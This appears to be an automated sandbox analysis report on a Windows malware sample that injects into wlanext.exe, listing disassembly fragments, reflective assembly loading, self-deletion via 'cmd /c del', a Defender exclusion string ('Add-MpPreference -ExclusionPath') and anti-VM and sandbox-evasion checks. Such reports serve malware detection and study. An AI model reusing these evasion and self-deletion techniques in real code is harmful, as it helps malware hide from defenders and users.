Source: 3.0.1D4l9eR0W4.exe.df0000.9.unpack, cC/cP.cs	.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.1D4l9eR0W4.exe.df0000.7.unpack, cC/cP.cs	.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 0_2_00E86C63 push es; ret	0_2_00E86C64
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041A80B push ecx; ret	3_2_0041A80C
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041B832 push eax; ret	3_2_0041B838
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041B83B push eax; ret	3_2_0041B8A2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041B89C push eax; ret	3_2_0041B8A2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041C514 push dword ptr [1A4A77D4h]; ret	3_2_0041C6C1
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_004155CA push FFFFFFC6h; iretd	3_2_004155DF
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041B7E5 push eax; ret	3_2_0041B838
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_00DF6C63 push es; ret	3_2_00DF6C64
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018ED0D1 push ecx; ret	3_2_018ED0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0366D0D1 push ecx; ret	7_2_0366D0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321B832 push eax; ret	7_2_0321B838
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321B83B push eax; ret	7_2_0321B8A2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321A80B push ecx; ret	7_2_0321A80C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321B89C push eax; ret	7_2_0321B8A2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321B7E5 push eax; ret	7_2_0321B838
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321C514 push dword ptr [1A4A77D4h]; ret	7_2_0321C6C1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_032155CA push FFFFFFC6h; iretd	7_2_032155DF

Source: 1D4l9eR0W4.exe

Static PE information: 0xEB22348E [Mon Jan 3 10:03:58 2095 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.74726232744

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\wlanext.exe	Process created: /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"			Jump to behavior

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 0.2.1D4l9eR0W4.exe.3321b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.665105654.000000000333D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1D4l9eR0W4.exe PID: 1476, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 1D4l9eR0W4.exe, 00000000.00000002.665105654.000000000333D000.00000004.00000001.sdmp, 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: 1D4l9eR0W4.exe, 00000000.00000002.665105654.000000000333D000.00000004.00000001.sdmp, 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 0000000003208614 second address: 000000000320861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 00000000032089AE second address: 00000000032089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe TID: 3480	Thread sleep time: -38554s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe TID: 7012	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4780	Thread sleep time: -55000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 7084	Thread sleep time: -46000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

Code function: 3_2_004088E0 rdtsc

3_2_004088E0

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Thread delayed: delay time: 38554			Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000000.669021166.0000000004791000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.701418123.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.698171111.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.701418123.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.673852871.000000000A897000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAb
Source: explorer.exe, 00000005.00000000.668994565.0000000004755000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.686546615.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.686700384.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000005.00000000.673852871.000000000A897000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
Source: 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

Code function: 3_2_004088E0 rdtsc

3_2_004088E0

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BC182 mov eax, dword ptr fs:[00000030h]	3_2_018BC182
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CA185 mov eax, dword ptr fs:[00000030h]	3_2_018CA185
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C2990 mov eax, dword ptr fs:[00000030h]	3_2_018C2990
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h]	3_2_018C61A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h]	3_2_018C61A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]	3_2_019151BE
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]	3_2_019151BE
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]	3_2_019151BE
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019151BE mov eax, dword ptr fs:[00000030h]	3_2_019151BE
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]	3_2_019549A4
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]	3_2_019549A4
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]	3_2_019549A4
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h]	3_2_019549A4
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019169A6 mov eax, dword ptr fs:[00000030h]	3_2_019169A6
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0189B1E1
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0189B1E1
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0189B1E1
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019241E8 mov eax, dword ptr fs:[00000030h]	3_2_019241E8
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]	3_2_01899100
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]	3_2_01899100
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01899100 mov eax, dword ptr fs:[00000030h]	3_2_01899100
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]	3_2_018B4120
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]	3_2_018B4120
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]	3_2_018B4120
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h]	3_2_018B4120
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B4120 mov ecx, dword ptr fs:[00000030h]	3_2_018B4120
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C513A mov eax, dword ptr fs:[00000030h]	3_2_018C513A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C513A mov eax, dword ptr fs:[00000030h]	3_2_018C513A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h]	3_2_018BB944
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h]	3_2_018BB944
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189C962 mov eax, dword ptr fs:[00000030h]	3_2_0189C962
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h]	3_2_0189B171
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h]	3_2_0189B171
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01899080 mov eax, dword ptr fs:[00000030h]	3_2_01899080
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01913884 mov eax, dword ptr fs:[00000030h]	3_2_01913884
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01913884 mov eax, dword ptr fs:[00000030h]	3_2_01913884
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D90AF mov eax, dword ptr fs:[00000030h]	3_2_018D90AF
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]	3_2_018C20A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]	3_2_018C20A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]	3_2_018C20A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]	3_2_018C20A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]	3_2_018C20A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h]	3_2_018C20A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CF0BF mov ecx, dword ptr fs:[00000030h]	3_2_018CF0BF
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h]	3_2_018CF0BF
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h]	3_2_018CF0BF
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0192B8D0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0192B8D0 mov ecx, dword ptr fs:[00000030h]	3_2_0192B8D0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0192B8D0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0192B8D0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0192B8D0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h]	3_2_0192B8D0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018958EC mov eax, dword ptr fs:[00000030h]	3_2_018958EC
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]	3_2_018940E1
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]	3_2_018940E1
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h]	3_2_018940E1
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01964015 mov eax, dword ptr fs:[00000030h]	3_2_01964015
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01964015 mov eax, dword ptr fs:[00000030h]	3_2_01964015
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]	3_2_01917016
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]	3_2_01917016
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01917016 mov eax, dword ptr fs:[00000030h]	3_2_01917016
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]	3_2_018AB02A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]	3_2_018AB02A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]	3_2_018AB02A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h]	3_2_018AB02A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]	3_2_018C002D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]	3_2_018C002D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]	3_2_018C002D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]	3_2_018C002D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h]	3_2_018C002D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h]	3_2_018B0050
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h]	3_2_018B0050
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01961074 mov eax, dword ptr fs:[00000030h]	3_2_01961074
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01952073 mov eax, dword ptr fs:[00000030h]	3_2_01952073
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h]	3_2_018A1B8F
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h]	3_2_018A1B8F
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0194D380 mov ecx, dword ptr fs:[00000030h]	3_2_0194D380
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C2397 mov eax, dword ptr fs:[00000030h]	3_2_018C2397
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CB390 mov eax, dword ptr fs:[00000030h]	3_2_018CB390
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195138A mov eax, dword ptr fs:[00000030h]	3_2_0195138A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]	3_2_018C4BAD
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]	3_2_018C4BAD
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]	3_2_018C4BAD
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01965BA5 mov eax, dword ptr fs:[00000030h]	3_2_01965BA5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019153CA mov eax, dword ptr fs:[00000030h]	3_2_019153CA
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019153CA mov eax, dword ptr fs:[00000030h]	3_2_019153CA
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BDBE9 mov eax, dword ptr fs:[00000030h]	3_2_018BDBE9
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]	3_2_018C03E2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]	3_2_018C03E2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]	3_2_018C03E2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]	3_2_018C03E2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]	3_2_018C03E2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]	3_2_018C03E2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195131B mov eax, dword ptr fs:[00000030h]	3_2_0195131B
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189DB40 mov eax, dword ptr fs:[00000030h]	3_2_0189DB40
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01968B58 mov eax, dword ptr fs:[00000030h]	3_2_01968B58
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189F358 mov eax, dword ptr fs:[00000030h]	3_2_0189F358
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189DB60 mov ecx, dword ptr fs:[00000030h]	3_2_0189DB60
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]	3_2_018C3B7A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h]	3_2_018C3B7A
